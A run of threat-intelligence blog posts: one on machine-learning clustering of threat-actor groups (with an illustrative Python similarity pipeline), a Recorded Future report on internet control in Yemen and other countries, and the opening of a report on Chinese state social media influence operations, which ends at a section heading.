As we detect and uncover malicious activity, we group forensically-related artifacts into 'clusters'. These clusters indicate actions, infrastructure, and malware that are all part of an intrusion, campaign, or series of activities which have direct links. These are what we call our "UNC" or "uncategorized" groups. Over time, these clusters can grow, merge with other clusters, and potentially 'graduate' into named groups, such as APT33 or FIN7. This graduation occurs only when we understand enough about their operations in each phase of the attack lifecycle and have associated the activity with a state-aligned program or criminal operation.

For every group, we can generate a summary document that contains information broken out into sections such as infrastructure, malware files, communication methods, and other aspects. Figure 1 shows a fabricated example with the various 'topics' broken out. Within each 'topic' – such as 'Malware' – we have various 'terms', which have associated counts. These numbers indicate how often we have recorded a group using that 'term'.

Figure 1: Example group 'documents' demonstrating how data about groups is recorded

The Problem

Our end goal is always to merge a new group either into an existing group once the link can be proven, or to graduate it to its own group if we are confident it represents a new and distinct actor set. These clustering and attribution decisions have thus far been performed manually and require rigorous analysis and justification. However, as we collect increasingly more data about attacker activities, this manual analysis becomes a bottleneck. Clusters risk going unanalyzed, and potential associations and attributions could slip through the cracks. Thus, we now incorporate a machine learning-based model into our intelligence analysis to assist with discovery, analysis, and justification for these claims.

The model we developed began with the following goals:

  1. Create a single, interpretable similarity metric between groups
  2. Evaluate past analytical decisions
  3. Discover new potential matches

Figure 2: Example documents highlighting observed term overlaps between two groups

The Model

This model uses a document clustering approach, familiar in the data science realm and often explained in the context of grouping books or movies. Applying the approach to our structured documents about each group, we can evaluate similarities between groups at scale.

First, we decided to model each topic individually. This decision means that each topic will result in its own measure of similarity between groups, which will ultimately be aggregated to produce a holistic similarity measure.

Here is how we apply this to our documents.

Within each topic, every distinct term is transformed into a value using a method called term frequency–inverse document frequency, or TF-IDF. This transformation is applied to every unique term for every document and topic, and the basic intuition behind it is to:

  1. Increase the importance of the term if it occurs often within the document.
  2. Decrease the importance of the term if it appears commonly across all documents.

This approach rewards distinctive terms such as custom malware families – which may appear for only a handful of groups – and down-weights common things such as 'spear-phishing', which appear for the vast majority of groups.

Figure 3 shows an example of TF-IDF being applied to a fictional "UNC599" for two terms: mal.sogu and mal.threebyte. These terms indicate the usages of SOGU and THREEBYTE within the 'malware' topic and thus we calculate their value within that topic using TF-IDF. The first (TF) value is how often those terms appeared as a fraction of all malware terms for the group. The second value (IDF) is the inverse of how frequently those terms appear across all groups. Additionally, we take the natural log of the IDF value, to smooth the effects of highly common terms – as you can see in the graph, when the value is close to 1 (very common terms), the log evaluates to near-zero, thus down-weighting the final TF x IDF value. Unique values have a much higher IDF, and thus result in higher values.

Figure 3: Breakdown of TF-IDF metric when evaluated for a single group in regard to malware

Once each term has been given a score, each group is now reflected as a collection of distinct topics, and each topic is a vector of scores for the terms it contains. Each vector can be conceived as an arrow, detailing the 'direction' that group is 'pointing' within that topic.

Within each topic space, we can then evaluate the similarity of various groups using another method – Cosine Similarity. If, like me, you did not love trigonometry – fear not! The intuition is simple. In essence, this is a measure of how parallel two vectors are. As seen in Figure 4, to evaluate two groups' usage of malware, we plot their malware vectors and see if they are pointing in the same direction. More parallel means they are more similar.

Figure 4: Simplified breakdown of Cosine Similarity metric when applied to two groups in the malware 'space'

One of the nice things about this approach is that large and small vectors are treated the same – thus, a new, relatively small UNC cluster pointing in the same direction as a well-documented APT group will still reflect a high level of similarity. This is one of the primary use cases we have, discovering new clusters of activity with high similarity to already established groups.

Using TF-IDF and Cosine Similarity, we can now calculate the topic-specific similarities for every group in our corpus of documents. The final step is to combine these topic similarities into a single, aggregate metric (Figure 5). This single metric allows us to quickly query our data for 'groups similar to X' or 'similarity between X and Y'. The question then becomes: What is the best way to build this final similarity?

Figure 5: Overall model flow diagram showing individual topic similarities and aggregation into final similarity matrix

The simplest approach is to take an average, and at first that’s exactly what we did. However, this approach did not match analyst intuition. As analysts, we feel that some topics matter more than others. Malware and methodologies should be more important than, say, server locations or target industries...right? However, when challenged to provide custom weightings for each topic, it was impossible to find an objective weighting system, free from analyst bias. Finally, we thought: "What if we used existing, known data to tell us what the right weights are?" In order to do that, we needed a lot of known – or "labeled" – examples of both similar and dissimilar groups.

Building a Labeled Dataset

At first our concept seemed straightforward: We would find a large dataset of labeled pairs, and then fit a regression model to accurately classify them. If successful, this model should give us the weights we wanted to discover.

Figure 6 shows some graphical intuition behind this approach. First, using a set of ‘labeled’ pairs, we fit a function which best predicts the data points.

Figure 6: Example Linear regression plot – in reality we used a Logistic Regression, but showing a linear model to demonstrate the intuition

Then, we use that same function to predict the aggregate similarity of un-labeled pairs (Figure 7).

Figure 7: Example of how we used the trained model to predict final similarity from individual topic similarities.

However, our data posed a unique problem in the sense that only a tiny fraction of all potential pairings had ever been analyzed. These analyses happened manually and sporadically, often the result of sudden new information from an investigation finally linking two groups together. As a labeled dataset, these pairs were woefully insufficient for any rigorous evaluation of the approach. We needed more labeled data.

Two of our data scientists suggested a clever approach: What if we created thousands of 'fake' clusters by randomly sampling from well-established APT groups? We could therefore label any two samples that came from the same group as definitely similar, and any two from separate groups as not similar (Figure 8). This gave us the ability to synthetically generate the labeled dataset we desperately needed. Then, using a linear regression model, we were able to elegantly solve this 'weighted average' problem rather than depend on subjective guesses.

Figure 8: Example similarity testing with 'fake' clusters derived from known APT groups

Additionally, these synthetically created clusters gave us a dataset upon which to test various iterations of the model. What if we remove a topic? What if we change the way we capture terms? Using a large labeled dataset, we can now benchmark and evaluate performance as we update and improve the model.

To evaluate the model, we observe several metrics:

  • Recall for synthetic clusters we know come from the same original group – how many do we get right/wrong? This evaluates the accuracy of a given approach.
  • For individual topics, the 'spread' between the calculated similarity of related and unrelated clusters. This helps us identify which topics help separate the classes best.
  • The accuracy of a trained regression model, as a proxy for the 'signal' between similar and dissimilar clusters, as represented by the topics. This can help us identify overfitting issues as well.
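As an added illustration (this is not FireEye's code) of the full pipeline described above, the block below builds per-topic TF-IDF vectors for constructed group documents, scores them with cosine similarity, samples 'fake' clusters from the known groups to produce labeled pairs, fits a plain logistic regression to learn the topic weights, and reports recall on the same-origin synthetic pairs; every group name, term and count is constructed for the example.

```python
"""Added illustration (not FireEye's code) of the pipeline the post describes:
per-topic TF-IDF vectors, cosine similarity per topic, synthetic labeled pairs
sampled from known groups, and a logistic regression that learns the topic
weights. Every group name, term and count below is constructed."""
import math
import random
from collections import Counter

TOPICS = ["malware", "methodology", "infrastructure"]

# Constructed 'documents': group -> topic -> {term: times recorded}.
GROUPS = {
    "APT_A": {"malware": {"mal.sogu": 12, "mal.threebyte": 4},
              "methodology": {"spear-phishing": 9, "dll-sideload": 5},
              "infrastructure": {"hosting.vps": 6, "tld.com": 7}},
    "APT_B": {"malware": {"mal.poisonivy": 10, "mal.gh0st": 3},
              "methodology": {"spear-phishing": 8, "webshell": 4},
              "infrastructure": {"hosting.vps": 5, "tld.net": 6}},
    "FIN_C": {"malware": {"mal.carbanak": 9, "mal.threebyte": 1},
              "methodology": {"spear-phishing": 7, "rdp-lateral": 6},
              "infrastructure": {"hosting.bulletproof": 8, "tld.com": 4}},
}


def tfidf_vectors(docs, topic):
    """TF = term count / all counts for that group within the topic;
    IDF = ln(groups / groups using the term): a term every group uses
    scores zero, a term unique to one group scores highest."""
    n = len(docs)
    df = Counter(t for doc in docs.values() for t in doc.get(topic, {}))
    vectors = {}
    for name, doc in docs.items():
        terms = doc.get(topic, {})
        total = sum(terms.values()) or 1
        vectors[name] = {t: (c / total) * math.log(n / df[t])
                         for t, c in terms.items()}
    return vectors


def cosine(u, v):
    """1.0 when the vectors point the same way, 0.0 when they share no
    weighted term; vector length (cluster size) does not matter."""
    dot = sum(w * v.get(t, 0.0) for t, w in u.items())
    nu = math.sqrt(sum(w * w for w in u.values()))
    nv = math.sqrt(sum(w * w for w in v.values()))
    return dot / (nu * nv) if nu and nv else 0.0


def topic_similarities(docs, a, b):
    """One cosine similarity per topic between groups a and b."""
    sims = []
    for topic in TOPICS:
        vecs = tfidf_vectors(docs, topic)
        sims.append(cosine(vecs[a], vecs[b]))
    return sims


def synthetic_pairs(docs, per_group=4, draws=20, seed=7):
    """Make 'fake' clusters by sampling terms from each known group, then
    label every pair 1 if both came from the same group, else 0."""
    rng = random.Random(seed)
    fakes, origin = {}, {}
    for name, doc in docs.items():
        for i in range(per_group):
            fake = {}
            for topic in TOPICS:
                terms = list(doc[topic])
                weights = [doc[topic][t] for t in terms]
                fake[topic] = dict(Counter(rng.choices(terms, weights, k=draws)))
            fakes[f"{name}#{i}"] = fake
            origin[f"{name}#{i}"] = name
    names = list(fakes)
    return [(topic_similarities(fakes, a, b), int(origin[a] == origin[b]))
            for i, a in enumerate(names) for b in names[i + 1:]]


def predict(w, b, x):
    """Aggregate similarity in (0, 1) from the per-topic similarities x."""
    z = b + sum(wi * xi for wi, xi in zip(w, x))
    z = max(-60.0, min(60.0, z))  # keep exp() in range on separable data
    return 1.0 / (1.0 + math.exp(-z))


def fit_logistic(pairs, lr=0.5, epochs=3000):
    """Plain gradient-descent logistic regression; the learned weights are
    the per-topic importances the post wanted in place of hand-picked ones."""
    w, b = [0.0] * len(TOPICS), 0.0
    for _ in range(epochs):
        gw, gb = [0.0] * len(TOPICS), 0.0
        for x, y in pairs:
            err = predict(w, b, x) - y
            gw = [g + err * xi for g, xi in zip(gw, x)]
            gb += err
        w = [wi - lr * g / len(pairs) for wi, g in zip(w, gw)]
        b -= lr * gb / len(pairs)
    return w, b


def recall(w, b, pairs, threshold=0.5):
    """Share of same-origin synthetic pairs the model scores as similar."""
    same = [x for x, y in pairs if y == 1]
    return sum(predict(w, b, x) >= threshold for x in same) / len(same)
```

Calling `fit_logistic(synthetic_pairs(GROUPS))` yields one weight per topic, which is the learned answer to the "custom weightings" question above, and `recall` reproduces the first evaluation metric in the list.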

Operational Use

In our daily operations, this model serves to augment and assist our intelligence experts. Presenting objective similarities, it can challenge biases and introduce new lines of investigation not previously considered. When dealing with thousands of clusters and new ones added every day from analysts around the globe, even the most seasoned and aware intel analyst could be excused for missing a potential lead. However, our model is able to present probable merges and similarities to analysts on demand, and thus can assist them in discovery.

Upon deploying this to our systems in December 2018, we immediately found benefits. One example is outlined in this blog post about potentially destructive attacks. Since then we have been able to inform, discover, or justify dozens of other merges.

Future Work

Like all models, this one has its weaknesses and we are already working on improvements. There is label noise in the way we manually enter information from investigations. There is sometimes 'extraneous' data about attackers that is not (yet) represented in our documents. Most of all, we have not yet fully incorporated the 'time of activity' and instead rely on 'time of recording'. This introduces a lag in our representation, which makes time-based analysis difficult. What an attacker has done lately should likely mean more than what they did five years ago.

Taking this objective approach and building the model has not only improved our intel operations, but also highlighted data requirements for future modeling efforts. As we have seen in other domains, building a machine learning model on top of forensic data can quickly highlight potential improvements to data modeling, storage, and access. Further information on this model can also be viewed in this video, from a presentation at the 2018 CAMLIS conference.

We have thus far enjoyed taking this approach to augmenting our intelligence model and are excited about the potential paths forward. Most of all, we look forward to the modeling efforts that help us profile, attribute, and stop attackers.

Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict

Insikt Group

Click here to download the complete analysis as a PDF.

This report serves as a follow up to Recorded Future’s previous work, “Underlying Dimensions of Yemen’s Civil War: Control of the Internet.” It is intended to provide an update on previous reporting, as well as explore the trend of government-mandated internet shutdowns and access control.

Sources of this research include the Recorded Future® Platform, findings and methods from the Citizen Lab, Shodan, VirusTotal, Censys, GreyNoise, DomainTools, ReversingLabs, and third-party metadata. Recorded Future would like to thank the Citizen Lab, AccessNow, NetBlocks, Oracle/Dyn, and Freedom House for their continued reporting on internet outages, access restrictions, and censorship.

Executive Summary

Despite attempted peace talks in early December 2018, the conflict in Yemen has continued to claim lives. The World Health Organization declared the country in crisis after a rampant cholera outbreak that plunged the Arabian nation into a humanitarian disaster centered around an epidemic, a famine, and a civil war. A truce in the port town of Al-Hudaydah has not yet been broken, and may provide an avenue to deliver humanitarian aid to a country on the brink of starvation. The grain stores held by the World Food Bank there are currently inaccessible, and may rot before a withdrawal is brokered.

As a result of continued airstrike activity, armed skirmishes among Yemeni factions, and the general degradation of Yemen’s infrastructure and public health, the small amount of internet infrastructure in Yemen remains diminished. Despite indications of low usage, Recorded Future has observed an increase in the deployment of network control devices on YemenNet, the ISP controlled by Houthi forces. Recorded Future did not observe substantive changes on the Yemen top-level domain (TLD) space, or on either major internet service provider in Yemen.

Internet access control has become a growing trend, as internet disruptions, information controls, and other censorship methods have been increasing globally. Within Yemen, factions vie for control of internet infrastructure and use a variety of techniques to control information entering and leaving their territories. Severing or restricting internet access has become the norm in a wider trend of internet restrictions and blackouts. India, Venezuela, Bangladesh, and Sudan have used diverse methods of controlling the internet access of their citizens.

Threat Analysis

Amid the fighting and the humanitarian disaster, international players still make attempts to leverage the horrible situation for positive headlines, or to maintain influence in Yemen. The United States stated that a January 6, 2019 drone strike against a known member of al-Qaeda in the Arabian Peninsula “delivered justice” in reprisal for the al-Qaeda bombing of the USS Cole in the Gulf of Aden in the year 2000. Saudi Arabian-backed missile strikes against the Houthi-held capital, Sana’a, continue to claim civilian lives despite being “targeted military strikes.”

In February 2019, CNN published a report detailing how U.S.-made weapon systems originally sold to Saudi Arabia and the United Arab Emirates have allegedly reached the hands of al-Qaeda members and Houthi militias, including armored Mine-Resistant Ambush Protected (MRAP) vehicles. The Houthis, with the inadvertent aid of U.S. vehicles and weapons, have not only grown beyond a well-organized militia into a more potent force, but have also become more capable of censorship and surveillance.

Recorded Future, via Shodan searches, identified the deployment of two additional Netsweeper devices on YemenNet on two IP addresses. One of the devices was still up at the time of this analysis. The re-emergence of censorship devices on the Houthi-controlled network may be a sign of momentary stability in Yemen’s conflict, as operators may now have the time and safety to make the devices operational. Houthi forces have previously breached WhatsApp groups, and local contacts indicate that the group continues to have access to private chats, likely via individual mobile compromise or by enticing individuals to provide them data.

Recorded Future could not confirm the ongoing censorship of traffic in Yemen due to Netsweeper installations, which is likely a combination of low volumes of traffic in Yemen as well as a lack of monitoring capability and visibility within YemenNet. Rapid7’s National Exposure Index found that although Yemeni ASNs have allocated 135,168 IP addresses, only 17,934 addresses were assigned, indicating low usage.

Recorded Future has not observed the widespread adoption of AdenNet in the country yet, which may be related to the fact that the Hadi government, which implemented the ISP, still resides largely in Saudi Arabia, and not in Aden. General internet usage appears low in Yemen, as GreyNoise data found only 538 total hosts observed in the country, which is a low number of hosts in a country of Yemen’s size and IP allocation. Comparatively, Shodan detected a total of 44,451 devices in the country, but no data indicates that they are being used.

DomainTools data indicates that there are now 1,184 .ye domains (Yemen’s TLD) — a minor increase of 32 domain purchases. Recorded Future did not observe any of these domain registrations. The TLD remains under the administration of the Houthis and YemenNet. This control of the TLD allows the Houthis to pose themselves as the legitimate administrators of Yemen to the outside internet.

Emerging Internet Disruption Activity Globally

The severing of undersea cables and other efforts to control Yemen’s internet have not taken place in a vacuum, but rather have become a troubling trend globally, predominantly in Africa. Internet disruptions, information control, and other censorship methods have been increasing globally, according to a number of watchdog and non-profit organizations. Recent reporting has found that censorship of HTTP traffic, VPN blockages, and censorship of emojis happens in various nations. Of note, Venezuela, India, Bangladesh, and Sudan have used diverse methods of manipulating the internet access of their citizens.

Figure: Timeline of internet outages in 2019. (Source: Recorded Future)

These countries are of interest to multinational corporations for a number of reasons. Venezuela is a player in the international oil market, and the political situation there continues to destabilize international access to the country. Bangladesh is particularly interesting to retail companies, as a large proportion of the garment supply chain can be found in the country. Finally, Sudan — and other African nations with lower rates of internet penetration — has been more inclined to shut down the internet in various ways, providing interesting case studies in potential human rights abuses.


Venezuela has been immersed in political discontent driven by hyperinflation and shortages of food and medicine, heightened by power grabs, electrical instability, and internet outages. Rival factions have vied for power and control of Venezuela, with groups attempting to control internet and information access within the country. This has included small-scale, targeted DNS manipulation within Venezuela, country-wide blocking of streaming services, and total blackouts of any internet access.

Regional blackouts and country-wide internet disruptions have been reported in Venezuela since January 2019. NetBlocks has also reported on social media and information website blackouts inside of the country in relation to the disputed presidency and ongoing economic turmoil. NetBlocks further found an outage of YouTube, Periscope, and other streaming platforms during a speech from the interim president on January 27, 2019.

In February 2019, Kaspersky Lab found evidence of DNS manipulation within Venezuela. The attackers modified the DNS records of a legitimate volunteering website to a potentially malicious IP address in Venezuela which also hosted a malicious domain. This directed users inside of Venezuela to the malicious infrastructure while the rest of the globe was routed to the expected infrastructure. This activity is believed to be used to target and phish Venezuelan citizens who support interim president, Juan Guaidó, according to findings from Motherboard.


On January 2, 2019, Bangladesh ordered a national-level throttling of all mobile data services in the country, ahead of its national election. Bangladesh chose to limit mobile data access, as 93 percent of the country’s internet connections come from mobile phones, according to the Bangladesh Telecommunication Regulatory Commission. Recorded Future believes that these efforts are likely attempts to quell social unrest within the country to prevent the spread of information regarding the country’s numerous accusations of human rights abuses.

The shutdowns appear to have the dual purpose of limiting communication within the country, as well as preventing the spread of evidence of atrocities within the country to the outside world. This appears to be similar to activity that Recorded Future observed in Yemen — with control of the internet infrastructure and Yemen TLD space, Houthi forces attempted to characterize Yemen as a Houthi country to the world outside. Recorded Future suspects that the Bangladeshi government may be attempting to control the external narrative of the country’s internal affairs in a similar manner as exercised in Yemen.


India led the globe in 2018 in the number of internet disruptions and outages, with 134 reported incidents. The internet is so often disrupted in India that a service has been stood up to track the activity. The lack of connectivity in the country is not due to strained providers or insufficient infrastructure, but to erratic and sometimes unexplained government orders to fixed-line and wireless providers to revoke access. The incidents are described as “government-imposed disablement of access to the internet as a whole within one or more localities for any duration of time.” The regularity of the activity is troubling, as is the scale of how much internet access is restricted or severed.

The majority of the shutdowns targeted mobile providers and have come from the northwest corner of the country, which borders regional rival Pakistan, including Punjab and Kashmir. The majority of shutdowns have come in response to reports of militant activity, and to quell potential rumors of further activity. Often, connectivity is degraded to 2G speeds, or entirely cut off, according to Freedom House’s 2018 report on internet freedoms in India. The report found that government officials often cite “precautionary measures” when ordering internet and cellular providers to reduce or shut down access. Recorded Future anticipates that internet shutdowns in the border area will increase in scope and magnitude in the near term due to heightened tensions between Pakistan and India.

India’s internet control differs from the others in scope, frequency, and methodology. India is a democracy that limits internet access in minority regions in response to terrorism and militant activity. Typically, internet censorship and access control are associated with authoritarian regimes or developing nations, whereas India is a democracy and maintains the world’s sixth largest gross domestic product (GDP), a measure used to determine relative economic size. Researchers from Montclair State University estimated that the 59 internet blackouts in the border region in 2017 alone cost India nearly half a billion dollars in GDP.

Freedom House also published an annual report on global trends, which made note of countries globally purchasing Chinese telecommunications infrastructure, India being among those countries. Yemen, notably, has also purchased a large amount of equipment from Chinese telecommunication company Huawei. Alongside this infrastructure was the deployment of Netsweeper content filtering devices. Using Shodan, Recorded Future identified eight Netsweeper instances in the country, and found that five of those devices were signed with Huawei SSL certificates. Recorded Future could not confirm the ongoing censorship of traffic in India from the Netsweeper devices.


Digital rights non-profits AccessNow and Netblocks reported a countrywide outage of access to Twitter, Facebook, Instagram, and WhatsApp across Sudan in December 2018. The blocking of those applications came amid protests following 70 percent inflation and a spike in grain and oil prices in the country. Sudan’s regime has responded harshly to the nationwide protests, cracking down on civilians with riot police using tear gas and live ammunition, killing dozens of protestors. Internet access was degraded across the country, limiting access to the aforementioned applications to prevent “rumor mongering.”

This censorship showed a coordinated effort across multiple ISPs to block access to social media and communication applications. Sudanese telecommunication providers Zain-SDN, Sudatel, and Kanartel were affected by the blackout, as was international telecom MTN, which reportedly did not block WhatsApp. This is likely indicative of the regime leaning on the internet service providers to facilitate an effective media blackout. Members of Anonymous encouraged Sudanese residents to use TOR or a VPN on their mobile devices to bypass the blockade, but there was no indication of whether this method effectively evaded the ISP blackout.

Methods of Internet Control in Statecraft and Conflict

These recent acts of censorship and internet shutdowns reflect the different methods that regimes and rebel groups use to control information access. The blunter methods generally lead to internet blackouts at large, as exhibited by Yemen when Houthi forces severed internet cables, as well as the more brutish blackouts used by Bangladesh and Zimbabwe this year, subjecting citizens to total internet outages.

Countrywide censorship is also possible at the routing level, but is not always easily implemented. Russia made a failed attempt at blocking the encrypted messaging application Telegram at the protocol level, and eventually blocked entire subnets belonging to Google and Amazon, which had widespread negative impacts on the country’s internet. Turkey used crude DNS hijacking against Google DNS and OpenDNS in 2014 to curtail the country’s use of Twitter and other social media platforms. Iran has imposed content blackouts by using BGP hijacking to sinkhole media traffic, among other methods, including HTTP host-based blocking, keyword filtering, and protocol-based throttling.

Content-level censorship can be used in countries with extensive control over their IP and DNS infrastructure, as previously noted in Yemen’s use of Netsweeper devices. The Citizen Lab has previously conducted research on these censorship devices, while new reports have found countries in the Middle East using technology capable of deep packet inspection for content monitoring.


Censorship at these levels is not limited to the countries above, but internet control has become a tool being used more and more by countries as part of their statecraft. Government censorship is not a new trend, but outside parties are increasingly reporting on such incidents. States that implement such measures take a risk — they may maintain control over their populations, but these actions will also likely be detrimental to their domestic economies and stifle business opportunities. Countries that implement digital censorship tend to slow their own technological growth and business innovation.

These internet shutdowns can create heightened risk for the entire region they affect. Additionally, beyond the social costs, censorship and shutdowns can severely hamper economic growth and trade. Many businesses that operate online or rely on cellular service can incur heavy losses, and production in the affected states can be curtailed. Corporations operating in those countries can lose control of their operations, which can lead to tampering, or leave workers feeling stranded without contact from their headquarters.

The post Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict appeared first on Recorded Future.


Beyond Hybrid War: How China Exploits Social Media to Sway American Opinion

Insikt Group


Recorded Future analyzed data from several Western social media platforms from October 1, 2018 through February 22, 2019 to determine how the Chinese state exploits social media to influence the American public. This report details those techniques and campaigns using data acquired from the Recorded Future® Platform, social media sites, and other OSINT techniques. This report will be of most value to government departments, geopolitical scholars and researchers, and all users of social media.

Executive Summary

Since the 2016 U.S. presidential election, researchers, reporters, and academics have devoted countless resources to understanding the role that Russian disinformation, or influence operations, played in the outcome of the election. As a result, there exists an implicit assumption that other state-run influence campaigns must look the same and operate in the same manner.

However, our research demonstrates that social media influence campaigns are not a one-size-fits-all technique. We studied Chinese state-run social media influence operations and concluded that the Chinese state utilized techniques different from the Russian state. These differences in technique are driven by dissimilar foreign policy and strategic goals. President Xi Jinping has global strategic goals for China different from those President Vladimir Putin has for Russia; as a result, the social media influence techniques used by China are different from those used by Russia.

Further, our research has revealed that the manner in which China has attempted to influence the American population is different from the techniques they use domestically. We believe that the Chinese state has employed a plethora of state-run media to exploit the openness of American democratic society in an effort to insert an intentionally distorted and biased narrative portraying a utopian view of the Chinese government and party.

Key Judgments

  • Chinese English-language social media influence operations are seeded by state-run media, which overwhelmingly present a positive, benign, and cooperative image of China.
  • Chinese influence accounts used paid advertisements to target American users with political or nationally important messages and distorted general news about China.
  • It is likely that weekly guidance issued by state propaganda authorities drives accounts to propagate positive messages in concert regarding special events once or twice a month.
  • We assess that these Chinese state-run influence accounts did not attempt a large-scale campaign to influence American voters in the run-up to the November 6, 2018, midterm elections. However, on a small scale, we observed all of our researched state-run influence accounts disseminating breaking news and biased content surrounding President Trump and China-related issues.
  • We believe that Russian social media influence operations are disruptive and destabilizing because those techniques support Russia’s primary strategic goal. Conversely, China’s state-run social media operations are largely positive and coordinated because those techniques support Chinese strategic goals.



In January 2017, the U.S. Intelligence Community published a seminal unclassified assessment on Russian efforts to influence the 2016 U.S. presidential election. One of the key judgments in this assessment concluded:

For most Americans, the influence campaign waged by the Russian state on Western social media platforms in 2016 was the first time they had ever encountered an information operation. Over the ensuing three years, investigations by the Department of Justice, academics, researchers, and others exposed the breadth, depth, and impact of the Russian influence campaign upon the American electorate.

While the experience of being targeted by an influence campaign was new for most Americans, these types of operations have been a critical component of many nations’ military and intelligence capabilities for years. Broadly, information or influence operations are defined by the RAND Corporation as “the collection of tactical information about an adversary as well as the dissemination of propaganda in pursuit of a competitive advantage over an opponent.”

For Russia, influence operations are part of a larger effort called “information confrontation.” According to the Defense Intelligence Agency:

In this study of Chinese influence operations, we also wanted to incorporate a term created by French researchers in a seminal 2018 joint research report — “information manipulation.” Information manipulation, as defined by the two French agencies, is “the intentional and massive dissemination of false or biased news for hostile political purposes.”

According to the French researchers, nation-state information manipulation includes three criteria:

  1. A coordinated campaign
  2. The diffusion of false information or information that is consciously distorted
  3. The political intention to cause harm

As the researchers of this paper discuss, it is important — especially in the case of Chinese state-run information manipulation campaigns — to distinguish the political intent and national strategies underlying these campaigns as different from simply another perspective on the news.

We will use both the terms “influence operation” and “information manipulation” in this report and want to be sure the definitions and criteria for each are well articulated for the reader.

Both the Russian and Chinese state-run media assert themselves as simply countering the mainstream English-language media’s narrative and bias against their nations and people. English-language, state-run media for both countries hire fluent, often Western-educated journalists and hosts, and have become effective at leveraging legitimate native English-language journalists and television hosts.

Both countries use English-language state media to seed the message of their information manipulation campaigns; what distinguishes the Russian and Chinese approaches are their tactics, strategic goals, and efficacy. In this report, we will focus on the English-language social media aspects of China’s information manipulation and demonstrate how and why China’s campaigns are different from Russia’s.

Research Scope

Our research focused on the English-language social media activity of six major state-run propaganda organizations from October 1, 2018 through January 21, 2019, which included over 40,000 posts. We selected these six organizations — Xinhua, People’s Daily, China Global Television Network (CGTN), China Central Television (CCTV), China Plus News, and the Global Times — because they:

  • Are highly digitized
  • Possess accounts on multiple English language social media platforms
  • Are associated with Chinese intelligence agencies and/or English language propaganda systems

Because our intent was to map out Chinese state-run influence campaigns targeting the American public, we evaluated only English language posts and comments, as the posts in Chinese were unlikely to affect most Americans. Further, our research focused on answering two fundamental questions about Chinese influence operations:

  1. Does China employ the same influence tactics in the English-language social media space as it does domestically?
  2. How do Chinese state-run influence operations differ from Russian ones? In what ways are they similar and different, and why?

We searched for patterns of automated dissemination, scrutinized relationships among reposts and top reposting accounts, examined account naming conventions, and profiled post topics and hashtags.

Further, we also included the extensive profiling of and comparisons with Russia’s state-run influence operations. Thus far, Russia’s influence operations have been the most widely studied, and comparisons are necessary both for context and to demonstrate that not all social media influence campaigns are alike. Russia uses a specific set of tools and techniques designed to support Russia’s strategic goals. As we will demonstrate in this report, China’s social media influence campaigns employ different tactics and techniques because China’s strategic goals are different from Russia’s.

Editor’s Note: Due to terms of service restrictions, we are unable to provide details on the full range of social media activities used by the Chinese state in this report. We have listed specific instances where possible.

The Russian Model of Social Media Influence Operations

Russian attempts to leverage English-language social media to undermine faith in democratic processes, support pro-Russian policies or preferred outcomes, and sow division within Western societies have been well documented over the past several years.

Research on Russian information manipulation and social media operations has been critical to identifying the threat and countering the negative impacts on democratic societies. However, the intense focus on Russian campaigns has led many to assume that because Russia was (arguably) so effective at manipulating social media, other nations must use the same tactics. This is not the case. Russia’s social media operations are unique to Russia’s strategic goals, domestic political and power structures, and the social media landscape of 2015 to 2016.

In terms of its relationship with Western democracies, Russia has a single primary goal under which others fall. This goal is to create a “polycentric” international system where the interests and policy goals of the Russian state are supported and respected. This essentially involves the wholesale reorienting of the current, Western-dominated international system. Regarding Russia’s efforts toward the United States in particular, this means “challenging the resolve of NATO,” manipulating and creating distrust in the U.S. electoral system, and exacerbating disagreements and divisions between the U.S. and the European Union.

This strategy and these goals drive the tactics Russia used in its social media influence operations.

First, the Russian state employed a nominally “private” company, the Internet Research Agency, to run social media influence operations. The Internet Research Agency was funded by Concord Management and Consulting, a company controlled by a man known as “Putin’s chef” (Yevgeniy Prigozhin), who has long-standing ties to Russian government officials. Prigozhin has even been described by some as “among the president’s [Putin’s] closest friends.”

This is a critical distinction to note when comparing state-run influence operations. In Russia, individuals like Prigozhin, who are close to President Putin but are not themselves government officials, provide the means for the Russian government to engage in social media operations while maintaining distance and deniability for the regime. This is a distinct and distinguishing feature of Russian social media influence campaigns compared to those of other nations.

The effective use of “front” companies and organizations (including both Concord Management and the Internet Research Agency) is a distinctive feature of Russian influence operations.

Second, Russian social media influence tactics have evolved over the past three years. As former Internet Research Agency employee Vitaly Bespalov described it:

Essentially, in the early days of the Internet Research Agency, writers would be hired to create and propagate “fake news” and content that supported broader Russian strategic messages and goals. Content from Russian state-run media was also widely propagated by Russian English-language social media accounts.

However, Recorded Future’s research into Russian social media operations before, during, and immediately after the 2018 U.S. midterm elections revealed that at least a subset of Russian-attributed accounts has moved away from propagating “fake news.” Instead, these accounts, which can be classified as “right trolls,” propagate and amplify hyperpartisan messages, or sharply polarized perspectives on legitimate news stories.

Our research indicated that these Russian accounts regularly promulgated content by politicians and mainstream U.S. news sources, such as Fox News, MSNBC, and CNBC. They also regularly propagated posts by hyperpartisan sites, such as the Daily Caller, Hannity, and Breitbart. The vast majority of these proliferated stories and posts were based in fact, but presented a hyperpartisan, or sharply polarized, perspective on those facts.

This evolution, even if only among a subset of the larger Russian state-directed English-language social media operations, is also a technique unique to Russian operations. By contrast, the limited reporting available on Iranian influence operations describes simple amplification: in the summer of 2018, Reuters discovered a network of social media accounts that “were part of an Iranian project to covertly influence public opinion in other countries.” The accounts were run by an organization called the International Union of Virtual Media (IUVM), propagated “content from Iranian state media and other outlets aligned with the government in Tehran across the internet,” and acted as a “large-scale amplifier for Iranian state messaging.”

While this evolution and expansive weaponization of many different types of content may be a result of the length of time for which the Russian government has been conducting social media influence operations, it is also a distinct feature of Russian operations.

Third, using social media operations to “undermine unity, destabilise democracies, erode trust in democratic institutions,” and sow general popular discontent and discord are also uniquely Russian techniques designed to support uniquely Russian strategic goals. Again, Russia’s strategic goals are rooted in the desire to reorient and disrupt the entire Western-dominated international system. Therefore, we assess that the fact that Russian social media influence operations also seek to destabilize, erode trust, promote chaos, and sow popular discontent completely aligns with this overarching disruptive goal.

We believe Russian social media influence operations are disruptive and destabilizing because that is Russia’s primary strategic goal. National interests and strategy drive social media influence operations in the same way that they drive traditional intelligence, military, and cyber operations. As a result, each nation’s influence operations use different tactics and techniques because the broad strategic goals they are supporting are all different. As we will discuss below, Chinese social media operations are different and use techniques different from Russian ones because China’s strategic goals are different from Russia’s.

The Chinese Domestic Model of Social Media Influence Operations

